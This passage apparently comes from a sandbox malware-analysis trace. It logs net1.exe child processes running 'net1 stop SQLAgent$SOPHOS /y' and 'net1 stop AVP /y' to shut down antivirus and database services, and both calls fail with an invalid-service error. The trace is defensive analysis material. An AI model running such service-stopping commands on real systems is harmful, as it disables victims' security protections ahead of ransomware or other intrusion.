HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.984] GetConsoleOutputCP () returned 0x1b5 [0122.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.986] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.989] sprintf_s (in: _DstBuf=0x20f8b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.989] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.996] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.996] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.996] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SOPHOS /y" [0122.996] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f650, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.996] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.996] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20f8a8 | out: Buffer=0x20f8a8*=0x2e4d50) returned 0x0 [0122.996] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20f8a8 | out: Buffer=0x20f8a8*=0x2ec100) returned 0x0 [0122.996] _fileno (_File=0x7fefdba2a80) returned 0 [0122.996] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.996] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.996] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.996] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.996] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.996] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.996] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.996] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.997] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.997] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.997] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.997] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.997] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.997] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.997] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.997] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.997] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.997] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.997] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.997] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.997] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.997] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.997] _wcsicmp (_String1="accounts", _String2="SQLAgent$SOPHOS") returned -18 [0122.997] _wcsicmp (_String1="computer", _String2="SQLAgent$SOPHOS") returned -16 [0122.997] _wcsicmp (_String1="config", _String2="SQLAgent$SOPHOS") returned -16 [0122.997] _wcsicmp (_String1="continue", _String2="SQLAgent$SOPHOS") returned -16 [0122.997] _wcsicmp (_String1="cont", _String2="SQLAgent$SOPHOS") returned -16 [0122.997] _wcsicmp (_String1="file", _String2="SQLAgent$SOPHOS") returned -13 [0122.997] _wcsicmp (_String1="files", _String2="SQLAgent$SOPHOS") returned -13 [0122.997] _wcsicmp (_String1="group", _String2="SQLAgent$SOPHOS") returned -12 [0122.997] _wcsicmp (_String1="groups", _String2="SQLAgent$SOPHOS") returned -12 [0122.997] _wcsicmp (_String1="help", _String2="SQLAgent$SOPHOS") returned -11 [0122.997] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SOPHOS") returned -11 [0122.997] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SOPHOS") returned -7 [0122.997] _wcsicmp (_String1="pause", _String2="SQLAgent$SOPHOS") returned -3 [0122.997] _wcsicmp (_String1="session", _String2="SQLAgent$SOPHOS") returned -12 [0122.997] _wcsicmp (_String1="sessions", _String2="SQLAgent$SOPHOS") returned -12 [0122.997] _wcsicmp (_String1="sess", _String2="SQLAgent$SOPHOS") returned -12 [0122.997] _wcsicmp (_String1="share", _String2="SQLAgent$SOPHOS") returned -9 [0122.997] _wcsicmp (_String1="start", _String2="SQLAgent$SOPHOS") returned 3 [0122.997] _wcsicmp (_String1="stats", _String2="SQLAgent$SOPHOS") returned 3 [0122.997] _wcsicmp (_String1="statistics", _String2="SQLAgent$SOPHOS") returned 3 [0122.997] _wcsicmp (_String1="stop", _String2="SQLAgent$SOPHOS") returned 3 [0122.997] _wcsicmp (_String1="time", _String2="SQLAgent$SOPHOS") returned 1 [0122.997] _wcsicmp (_String1="user", _String2="SQLAgent$SOPHOS") returned 2 [0122.997] _wcsicmp (_String1="users", _String2="SQLAgent$SOPHOS") returned 2 [0122.997] _wcsicmp (_String1="msg", _String2="SQLAgent$SOPHOS") returned -6 [0122.997] _wcsicmp (_String1="messenger", _String2="SQLAgent$SOPHOS") returned -6 [0122.997] _wcsicmp (_String1="receiver", _String2="SQLAgent$SOPHOS") returned -1 [0122.997] _wcsicmp (_String1="rcv", _String2="SQLAgent$SOPHOS") returned -1 [0122.997] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SOPHOS") returned -5 [0122.998] _wcsicmp (_String1="redirector", _String2="SQLAgent$SOPHOS") returned -1 [0122.998] _wcsicmp (_String1="redir", _String2="SQLAgent$SOPHOS") returned -1 [0122.998] _wcsicmp (_String1="rdr", _String2="SQLAgent$SOPHOS") returned -1 [0122.998] _wcsicmp (_String1="workstation", _String2="SQLAgent$SOPHOS") returned 4 [0122.998] _wcsicmp (_String1="work", _String2="SQLAgent$SOPHOS") returned 4 [0122.998] _wcsicmp (_String1="wksta", _String2="SQLAgent$SOPHOS") returned 4 [0122.998] _wcsicmp (_String1="prdr", _String2="SQLAgent$SOPHOS") returned -3 [0122.998] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SOPHOS") returned -15 [0122.998] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SOPHOS") returned -7 [0122.998] _wcsicmp (_String1="server", _String2="SQLAgent$SOPHOS") returned -12 [0122.998] _wcsicmp (_String1="svr", _String2="SQLAgent$SOPHOS") returned 5 [0122.998] _wcsicmp (_String1="srv", _String2="SQLAgent$SOPHOS") returned 1 [0122.998] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SOPHOS") returned -7 [0122.998] _wcsicmp (_String1="alerter", _String2="SQLAgent$SOPHOS") returned -18 [0122.998] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SOPHOS") returned -5 [0122.998] _wcsupr (in: _String="SQLAgent$SOPHOS" | out: _String="SQLAGENT$SOPHOS") returned="SQLAGENT$SOPHOS" [0122.998] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ece10 [0123.011] GetServiceKeyNameW (in: hSCManager=0x2ece10, lpDisplayName="SQLAGENT$SOPHOS", lpServiceName=0xffb35750, lpcchBuffer=0x20f7c8 | out: lpServiceName="", lpcchBuffer=0x20f7c8) returned 0 [0123.014] _wcsicmp (_String1="msg", _String2="SQLAGENT$SOPHOS") returned -6 [0123.014] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SOPHOS") returned -6 [0123.014] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SOPHOS") returned -1 [0123.014] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SOPHOS") returned -1 [0123.014] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SOPHOS") returned -1 [0123.014] _wcsicmp (_String1="redir", _String2="SQLAGENT$SOPHOS") returned -1 [0123.014] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SOPHOS") returned -1 [0123.014] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SOPHOS") returned 4 [0123.014] _wcsicmp (_String1="work", _String2="SQLAGENT$SOPHOS") returned 4 [0123.014] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SOPHOS") returned 4 [0123.014] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SOPHOS") returned -3 [0123.014] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SOPHOS") returned -15 [0123.014] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SOPHOS") returned -7 [0123.014] _wcsicmp (_String1="server", _String2="SQLAGENT$SOPHOS") returned -12 [0123.014] _wcsicmp (_String1="svr", _String2="SQLAGENT$SOPHOS") returned 5 [0123.014] _wcsicmp (_String1="srv", _String2="SQLAGENT$SOPHOS") returned 1 [0123.014] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SOPHOS") returned -7 [0123.014] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SOPHOS") returned -18 [0123.014] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SOPHOS") returned -5 [0123.014] NetServiceControl (in: servername=0x0, service="SQLAGENT$SOPHOS", opcode=0x0, arg=0x0, bufptr=0x20f7d0 | out: bufptr=0x20f7d0) returned 0x889 [0123.018] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.018] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0123.018] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.019] GetFileType (hFile=0xb) returned 0x2 [0123.020] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f698 | out: lpMode=0x20f698) returned 1 [0123.021] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20f690, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x20f690*=0x1e) returned 1 [0123.021] GetFileType (hFile=0xb) returned 0x2 [0123.022] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f698 | out: lpMode=0x20f698) returned 1 [0123.022] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f690, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x20f690*=0x2) returned 1 [0123.023] _ultow (in: _Dest=0x889, _Radix=2160384 | out: _Dest=0x889) returned="2185" [0123.023] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.024] GetFileType (hFile=0xb) returned 0x2 [0123.024] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f698 | out: lpMode=0x20f698) returned 1 [0123.025] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20f690, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x20f690*=0x34) returned 1 [0123.026] GetFileType (hFile=0xb) returned 0x2 [0123.026] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f698 | out: lpMode=0x20f698) returned 1 [0123.026] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f690, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x20f690*=0x2) returned 1 [0123.028] NetApiBufferFree (Buffer=0x2e4d50) returned 0x0 [0123.028] NetApiBufferFree (Buffer=0x2ec100) returned 0x0 [0123.028] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SOPHOS /y" [0123.028] exit (_Code=2) Process: id = "397" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x784a3000" os_pid = "0xe7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "392" os_parent_pid = "0x1258" cmd_line = "C:\\Windows\\system32\\net1 stop AVP /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13598 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13599 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13600 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13601 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13602 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13603 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13604 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13605 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13606 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13607 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13608 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13609 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13610 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13611 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13612 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 13613 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13614 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13615 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13616 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13624 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13625 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 13626 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 13627 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13628 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13629 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13630 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13631 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13632 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13633 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13634 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13635 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13636 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13637 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13638 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13639 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13640 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13641 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13642 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13643 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 955 os_tid = 0xfb8 [0122.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbd0 | out: lpSystemTimeAsFileTime=0x1cfbd0*(dwLowDateTime=0xfe46fe30, dwHighDateTime=0x1d48689)) [0122.734] GetCurrentProcessId () returned 0xe7c [0122.734] GetCurrentThreadId () returned 0xfb8 [0122.734] GetTickCount () returned 0x28507 [0122.734] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfbd8 | out: lpPerformanceCount=0x1cfbd8*=1816965200000) returned 1 [0122.735] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.735] __set_app_type (_Type=0x1) [0122.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.735] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.735] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.735] GetConsoleOutputCP () returned 0x1b5 [0122.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.735] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.737] sprintf_s (in: _DstBuf=0x1cfb78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.737] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.738] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.738] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AVP /y" [0122.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.738] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.738] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfb68 | out: Buffer=0x1cfb68*=0x1f4d40) returned 0x0 [0122.738] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfb68 | out: Buffer=0x1cfb68*=0x1fc0e0) returned 0x0 [0122.739] _fileno (_File=0x7fefdba2a80) returned 0 [0122.739] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.739] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.739] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.739] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.739] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.739] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.739] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.739] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.739] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.739] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.739] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.739] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.739] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.739] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.739] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.739] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.739] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.739] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.739] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.739] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.739] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.739] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.739] _wcsicmp (_String1="accounts", _String2="AVP") returned -19 [0122.739] _wcsicmp (_String1="computer", _String2="AVP") returned 2 [0122.739] _wcsicmp (_String1="config", _String2="AVP") returned 2 [0122.739] _wcsicmp (_String1="continue", _String2="AVP") returned 2 [0122.739] _wcsicmp (_String1="cont", _String2="AVP") returned 2 [0122.739] _wcsicmp (_String1="file", _String2="AVP") returned 5 [0122.739] _wcsicmp (_String1="files", _String2="AVP") returned 5 [0122.739] _wcsicmp (_String1="group", _String2="AVP") returned 6 [0122.739] _wcsicmp (_String1="groups", _String2="AVP") returned 6 [0122.739] _wcsicmp (_String1="help", _String2="AVP") returned 7 [0122.745] _wcsicmp (_String1="helpmsg", _String2="AVP") returned 7 [0122.745] _wcsicmp (_String1="localgroup", _String2="AVP") returned 11 [0122.745] _wcsicmp (_String1="pause", _String2="AVP") returned 15 [0122.745] _wcsicmp (_String1="session", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="sessions", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="sess", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="share", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="start", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="stats", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="statistics", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="stop", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="time", _String2="AVP") returned 19 [0122.745] _wcsicmp (_String1="user", _String2="AVP") returned 20 [0122.745] _wcsicmp (_String1="users", _String2="AVP") returned 20 [0122.745] _wcsicmp (_String1="msg", _String2="AVP") returned 12 [0122.745] _wcsicmp (_String1="messenger", _String2="AVP") returned 12 [0122.745] _wcsicmp (_String1="receiver", _String2="AVP") returned 17 [0122.745] _wcsicmp (_String1="rcv", _String2="AVP") returned 17 [0122.745] _wcsicmp (_String1="netpopup", _String2="AVP") returned 13 [0122.745] _wcsicmp (_String1="redirector", _String2="AVP") returned 17 [0122.745] _wcsicmp (_String1="redir", _String2="AVP") returned 17 [0122.745] _wcsicmp (_String1="rdr", _String2="AVP") returned 17 [0122.745] _wcsicmp (_String1="workstation", _String2="AVP") returned 22 [0122.745] _wcsicmp (_String1="work", _String2="AVP") returned 22 [0122.745] _wcsicmp (_String1="wksta", _String2="AVP") returned 22 [0122.745] _wcsicmp (_String1="prdr", _String2="AVP") returned 15 [0122.745] _wcsicmp (_String1="devrdr", _String2="AVP") returned 3 [0122.745] _wcsicmp (_String1="lanmanworkstation", _String2="AVP") returned 11 [0122.745] _wcsicmp (_String1="server", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="svr", _String2="AVP") returned 18 [0122.745] _wcsicmp (_String1="srv", _String2="AVP") returned 18 [0122.746] _wcsicmp (_String1="lanmanserver", _String2="AVP") returned 11 [0122.746] _wcsicmp (_String1="alerter", _String2="AVP") returned -10 [0122.746] _wcsicmp (_String1="netlogon", _String2="AVP") returned 13 [0122.746] _wcsupr (in: _String="AVP" | out: _String="AVP") returned="AVP" [0122.746] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1fc900 [0122.769] GetServiceKeyNameW (in: hSCManager=0x1fc900, lpDisplayName="AVP", lpServiceName=0xffb35750, lpcchBuffer=0x1cfa88 | out: lpServiceName="", lpcchBuffer=0x1cfa88) returned 0 [0122.770] _wcsicmp (_String1="msg", _String2="AVP") returned 12 [0122.770] _wcsicmp (_String1="messenger", _String2="AVP") returned 12 [0122.770] _wcsicmp (_String1="receiver", _String2="AVP") returned 17 [0122.770] _wcsicmp (_String1="rcv", _String2="AVP") returned 17 [0122.770] _wcsicmp (_String1="redirector", _String2="AVP") returned 17 [0122.770] _wcsicmp (_String1="redir", _String2="AVP") returned 17 [0122.771] _wcsicmp (_String1="rdr", _String2="AVP") returned 17 [0122.771] _wcsicmp (_String1="workstation", _String2="AVP") returned 22 [0122.771] _wcsicmp (_String1="work", _String2="AVP") returned 22 [0122.771] _wcsicmp (_String1="wksta", _String2="AVP") returned 22 [0122.771] _wcsicmp (_String1="prdr", _String2="AVP") returned 15 [0122.771] _wcsicmp (_String1="devrdr", _String2="AVP") returned 3 [0122.771] _wcsicmp (_String1="lanmanworkstation", _String2="AVP") returned 11 [0122.771] _wcsicmp (_String1="server", _String2="AVP") returned 18 [0122.771] _wcsicmp (_String1="svr", _String2="AVP") returned 18 [0122.771] _wcsicmp (_String1="srv", _String2="AVP") returned 18 [0122.771] _wcsicmp (_String1="lanmanserver", _String2="AVP") returned 11 [0122.771] _wcsicmp (_String1="alerter", _String2="AVP") returned -10 [0122.771] _wcsicmp (_String1="netlogon", _String2="AVP") returned 13 [0122.771] NetServiceControl (in: servername=0x0, service="AVP", opcode=0x0, arg=0x0, bufptr=0x1cfa90 | out: bufptr=0x1cfa90) returned 0x889 [0122.772] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: 